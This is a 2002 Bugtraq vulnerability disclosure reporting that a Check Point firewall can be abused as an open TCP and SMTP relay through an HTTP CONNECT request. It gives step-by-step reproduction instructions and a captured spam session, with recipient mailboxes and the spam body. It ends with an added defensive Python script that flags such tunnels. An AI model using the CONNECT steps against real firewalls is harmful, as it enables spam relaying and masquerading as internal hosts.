[24329] in bugtraq
UPDATE: [wcolburn@nmt.edu: SMTP relay through checkpoint firewall]
daemon@ATHENA.MIT.EDU (William D. Colburn (aka Schlake))
Tue Feb 19 18:50:51 2002
Date: Mon, 18 Feb 2002 17:09:59 -0700
From: "William D. Colburn (aka Schlake)" <wcolburn@nmt.edu>
To: bugtraq@securityfocus.com, Dan Lunceford <dan@nmt.edu>,
Ryan <ryan@nmt.edu>, support@aquilagroup.com
Cc: Madeline Navarrette <mnavarre@ts.checkpoint.com>
Message-ID: <20020218170959.B24198@nmt.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Checkpoint bounced my mail because I'm not a checkpoint customer, so I
contacted customer advocacy and resent it to a different address (this
message is copied to her as well). I was told that the issue would be
propagated to an appropriate person.
Please drop the old message and continue to hold this message until
Checkpoint responds.
I have a few updates to this issue that I have learned since I crafted
the original message.
I only need to give the "CONNECT" line, and nothing else. After the
second newline there is a pause and then the TCP stream is open. I seem
to be able to open any port on any machine I want *except* port 80. I
was able to telnet in to UNIX login with the firewall appearing as the
remote host. The initial machine I use (inside the firewall) does not
need to actually exist, I merely have to attempt to connect to an IP
address "inside" on port 80.
This whole thing gives anyone outside a firewall the ability to masquerade on
any TCP service (except WWW) as a machine inside the domain of the
firewall. As far as I can tell there are no logs on this, and it is
hard to detect on the firewall. I found it by doing a tcpdump of all
packets and gradually narrowing down my filters until I was able to
"catch" an entire transaction.
----- Forwarded message from "William D. Colburn (aka Schlake)" <wcolburn@nmt.edu> -----
Step one: telnet to a machine behind the checkpoint firewall on port 80
Step two: Type the following:
>CONNECT mailserver.somecompany.com:25 / HTTP/1.0
>User-Agent: eeep
>Cache-Control: private,no-cache
>Pragma: no-cache
>
Step three: wait a moment for your SMTP banner to pop up.
I will attach an actual attack I captured with tcpdump and ethereal.
The file is the result of an ethereal "Follow TCP stream".
I hate the person who did this to me and I hope they die a terrible
death.
--
William Colburn, "Sysprog" <wcolburn@nmt.edu>
Computer Center, New Mexico Institute of Mining and Technology
http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn
--AqsLC8rIMeq19msA
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename=checkpoint
From root@netpeep.nmt.edu Mon Feb 18 16:05:43 2002
Return-Path: <root@netpeep.nmt.edu>
Received: from netpeep.nmt.edu (netpeep.nmt.edu [129.138.250.10])
by mailhost.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hF0009872
for <schlake@nmt.edu>; Mon, 18 Feb 2002 16:05:43 -0700
Received: from netpeep.nmt.edu (localhost [127.0.0.1])
by netpeep.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hnA020585
for <schlake@nmt.edu>; Mon, 18 Feb 2002 16:05:43 -0700
Received: (from root@localhost)
by netpeep.nmt.edu (8.12.2/8.12.1/Submit) id g1IN5h8w020584
for schlake@nmt.edu; Mon, 18 Feb 2002 16:05:43 -0700
Date: Mon, 18 Feb 2002 16:05:43 -0700
From: root <root@netpeep.nmt.edu>
Message-Id: <200202182305.g1IN5h8w020584@netpeep.nmt.edu>
To: schlake@nmt.edu
Content-Length: 3580
Lines: 112
CONNECT mail2.freeuk.net:25 / HTTP/1.0
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Cache-Control: private,no-cache
Pragma: no-cache
HELO hotmail.com
MAIL FROM: <pheros680506@hotmail.com>
RCPT TO: <renewinter@freeuk.com>
RCPT TO: <renewu@freeuk.com>
RCPT TO: <renfah@freeuk.com>
RCPT TO: <renfi11160@freeuk.com>
RCPT TO: <renfield13@freeuk.com>
RCPT TO: <renfield20@freeuk.com>
RCPT TO: <renfield94@freeuk.com>
RCPT TO: <renfrew@freeuk.com>
RCPT TO: <renfro33@freeuk.com>
RCPT TO: <reng3@freeuk.com>
RCPT TO: <renga@freeuk.com>
RCPT TO: <rengel293@freeuk.com>
RCPT TO: <rengel7495@freeuk.com>
RCPT TO: <rengelh946@freeuk.com>
RCPT TO: <rengers@freeuk.com>
RCPT TO: <rengised@freeuk.com>
RCPT TO: <rengl21068@freeuk.com>
RCPT TO: <rengl29048@freeuk.com>
RCPT TO: <rengl78818@freeuk.com>
DATA
Reply-To: <pheros680506@hotmail.com>
Message-ID: <004b71e11dcb$7144b8d2$6ac55bc3@mlpqff>
From: <pheros680506@hotmail.com>
To: <renewinter@freeuk.com>
Cc: <renewu@freeuk.com>,
<renfah@freeuk.com>,
<renfi11160@freeuk.com>,
<renfield13@freeuk.com>,
<renfield20@freeuk.com>,
<renfield94@freeuk.com>,
<renfrew@freeuk.com>,
<renfro33@freeuk.com>,
<reng3@freeuk.com>,
<renga@freeuk.com>,
<rengel293@freeuk.com>,
<rengel7495@freeuk.com>,
<rengelh946@freeuk.com>,
<rengers@freeuk.com>,
<rengised@freeuk.com>,
<rengl21068@freeuk.com>,
<rengl29048@freeuk.com>,
<rengl78818@freeuk.com>
Subject: A new fragrance (3437AlLf5-384bbsO4815hPeX5-01@27)
MiME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer:
Importance: Normal
Hi !
<HTML>
<head><title>Pheros attraction</title>
</head>
<BODY TEXT="#000000" LINK="#000000" VLINK="#000000" BGCOLOR="#7777FF">
<CENTER>
<TABLE WIDTH="650">
<TR>
<TD COLSPAN="2">
<FONT FACE="VERDANA, ARIAL">Notice: I have paid to be able to send you this e-mail. I do not intend to
cause you harm, fill up your mailbox or bother you needlessly. I am only
trying to reach those who are not as secure in their financial future as I
was when I first started looking for a way to earn money online. To be
removed, please go to the end of this e-mail. Please forgive me if you
receive this advertisement twice.<BR><BR>
</FONT>
</TD>
</TR>
<TR>
<TD VALIGN="TOP">
<FONT FACE="VERDANA, ARIAL">
Pheros is a lovely fragrance with a touch of human
pheromones, packaged in a exclusive crafted box.
Pheros is a foolproof tool of seduction, the scent and the
pheromones together make a foolproof combination.
No one can resist the wearer of this mysterious fragrance!
Pheros combines high tech science with the well-known
function of the scent of a luxorious perfume. <BR> The price is 19.95 USD/Bottle, including P&P! Payment is done via PayPal!
<BR>To order, klick the Paypal logo <A HREF="https://www.paypal.com/xclick/business=pheros3%40hotmail.com&item_name=Pheros&item_number=PherInt001&amount=19.95" TARGET="new"><IMG SRC="http://images.paypal.com/images/x-click-but02.gif" border="0"></A>
<BR>
</FONT>
</TD>
<TD>
<IMG SRC="http://pheros.freehosting.net/images/Mailbilden.jpg" border="2">
</TD>
</TR>
<TR>
<TD COLSPAN="2">
<BR>
<FONT FACE="Verdana, Arial">
To be removed from this mailing list, please reply to this message with the subjct "remove".
You will be BLOCKED from all mail from this site and your request will take effect within 24 hours.
</FONT>
</TD>
</TR>
</TABLE>
</CENTER>
</BODY>
</HTML>
[2901sDxs3-632TivA4099LrRl6-563cNjc6630cqwk8-434lwqh9794mwMr2-514eMAy1216cuz@71]
.
QUIT
--AqsLC8rIMeq19msA--
----- End forwarded message -----
--
William Colburn, "Sysprog" <wcolburn@nmt.edu>
Computer Center, New Mexico Institute of Mining and Technology
http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn
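The post notes that the firewall keeps no log of these tunnels and that the only way the relay was found was by reconstructing TCP streams with tcpdump and ethereal. The following is an added example, not part of Colburn's post or of any Check Point software, showing how a defender can triage such "Follow TCP stream" dumps automatically: it parses the leading CONNECT request line (accepting both the RFC 2817 form `CONNECT host:port HTTP/1.1` and the oddly formed `host:port / HTTP/1.0` seen in the capture), flags a CONNECT to anything other than an expected TLS port, and counts SMTP `RCPT TO:` lines in the tunnelled payload. The sample streams, host names and addresses are constructed for the example; the function names are the example's own.

```python
import re
from typing import Optional

# Constructed sample stream, modelled on the attachment in the post but with
# made-up host names and mailboxes: a CONNECT to port 25 followed by SMTP.
SAMPLE_STREAM = (
    "CONNECT mail.example.net:25 / HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\n"
    "Cache-Control: private,no-cache\r\n"
    "Pragma: no-cache\r\n"
    "\r\n"
    "HELO example.com\r\n"
    "MAIL FROM: <sender@example.com>\r\n"
    "RCPT TO: <alice@example.org>\r\n"
    "RCPT TO: <bob@example.org>\r\n"
    "DATA\r\n"
    "Subject: constructed sample\r\n"
    ".\r\n"
    "QUIT\r\n"
)

# Constructed benign stream: a normal browser CONNECT to an HTTPS site.
BENIGN_STREAM = (
    "CONNECT www.example.com:443 HTTP/1.1\r\n"
    "Host: www.example.com:443\r\n"
    "\r\n"
)

# Request line: CONNECT host:port [anything] HTTP/1.x
# The optional "extra" group captures stray tokens such as the " /" in the
# captured stream, which a real browser would never send.
CONNECT_RE = re.compile(
    r"^CONNECT\s+(?P<host>[^\s:/]+):(?P<port>\d{1,5})"
    r"(?P<extra>[^\r\n]*?)\s+HTTP/1\.[01]\s*$"
)


def parse_connect(line: str) -> Optional[dict]:
    """Return host/port/malformed for a CONNECT request line, or None."""
    m = CONNECT_RE.match(line.strip())
    if m is None:
        return None
    return {
        "host": m["host"],
        "port": int(m["port"]),
        # Any token between the port and the HTTP version is non-standard.
        "malformed": m["extra"].strip() != "",
    }


def analyse_stream(stream: str, allowed_ports=(443,)) -> dict:
    """Inspect a reconstructed client->proxy TCP stream for CONNECT abuse."""
    findings = []
    lines = stream.splitlines()
    req = parse_connect(lines[0]) if lines else None
    if req is None:
        # Not a CONNECT request at all; nothing to report here.
        return {"connect": None, "findings": findings, "rcpt_count": 0}

    if req["port"] not in allowed_ports:
        findings.append(
            f"CONNECT to non-TLS port {req['port']} on {req['host']}"
        )
    if req["malformed"]:
        findings.append(
            "malformed CONNECT request line (extra token before HTTP version)"
        )

    # The tunnelled payload starts after the blank line that ends the headers;
    # the post observes that the TCP stream opens at exactly that point.
    parts = re.split(r"\r?\n\r?\n", stream, maxsplit=1)
    body = parts[1] if len(parts) == 2 else ""
    rcpt_count = sum(
        1 for ln in body.splitlines() if ln.upper().startswith("RCPT TO:")
    )
    if rcpt_count:
        findings.append(
            f"SMTP envelope with {rcpt_count} RCPT TO inside tunnel"
        )

    return {"connect": req, "findings": findings, "rcpt_count": rcpt_count}


if __name__ == "__main__":
    for name, stream in (("sample", SAMPLE_STREAM), ("benign", BENIGN_STREAM)):
        result = analyse_stream(stream)
        print(name, result["connect"], result["findings"])
```

Run over every reconstructed stream that arrives at the firewall's port 80 from outside, the port check alone would have surfaced the relay in the post, since a browser CONNECT is essentially always to 443; the RCPT count distinguishes a bulk mailing from a single misdirected connection.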